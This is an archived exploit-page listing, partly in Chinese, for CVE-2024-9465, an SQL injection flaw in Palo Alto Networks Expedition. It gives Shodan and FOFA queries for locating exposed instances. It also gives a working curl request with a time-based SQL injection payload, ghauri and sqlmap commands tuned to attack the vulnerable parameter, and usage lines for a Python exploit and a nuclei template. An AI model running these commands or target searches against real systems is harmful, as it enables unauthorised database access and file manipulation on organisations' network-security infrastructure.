POC详情: 210d9b53915870d6e5cd782df6b57377bdbf079e

来源
关联漏洞
标题: Palo Alto Networks Expedition 安全漏洞 (CVE-2024-9465)
描述:Palo Alto Networks Expedition是美国Palo Alto Networks公司的一种有助于配置迁移、调优和丰富的工具。 Palo Alto Networks Expedition存在安全漏洞。攻击者利用该漏洞可以创建和读取任意文件。
描述
Checkpoint SQL Injection via Time-Based Attack (CVE-2024-9465)
介绍

# CVE-2024-9465
Checkpoint SQL Injection via Time-Based Attack (CVE-2024-9465) 

# SHODAN SEARCH
```url
https://www.shodan.io/search?query=html%3A%22Expedition+Project%22

html:"Expedition Project"
```
# FOFA SEARCH
```
https://en.fofa.info/
body="Expedition Project" || title="Expedition Project"
```

# USAGE 
```bash
python3 CVE-2024-9465.py -u https://domain.com
```

# cURL command
```bash
curl -X POST "https://domain.com/bin/configurations/parsers/Checkpoint/CHECKPOINT.php" \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "action=import&type=test&project=pandbRBAC&signatureid=1+AND+(SELECT+1234+FROM+(SELECT(SLEEP(10)))horizon3)" \
-w "Total Time: %{time_total}\n" \
-k
```

# Ghauri Command
```bash
ghauri --url "https://domain.com/bin/configurations/parsers/Checkpoint/CHECKPOINT.php" \
--data "action=import&type=test&project=pandbRBAC&signatureid=1" \
--technique T \
--dbms mysql \
--time-sec 10 \
-p signatureid \
--threads 10 
```
# SQLMAP command
```bash
sqlmap -u "https://domain.com/bin/configurations/parsers/Checkpoint/CHECKPOINT.php" \
--data "action=import&type=test&project=pandbRBAC&signatureid=1" \
--dbms=mysql \
--level 5 --risk 3 \
--time-sec=10 \
--technique=T \
--tamper=space2comment \
--batch --random-agent -v 3
```

# Nuclei command
```bash
nuclei -u https://domain.com -t CVE-2024-9465.yaml -v
```
文件快照

[4.0K] /data/pocs/210d9b53915870d6e5cd782df6b57377bdbf079e ├── [1.8K] CVE-2024-9465.py ├── [1.2K] CVE-2024-9465.yaml └── [1.3K] README.md 0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。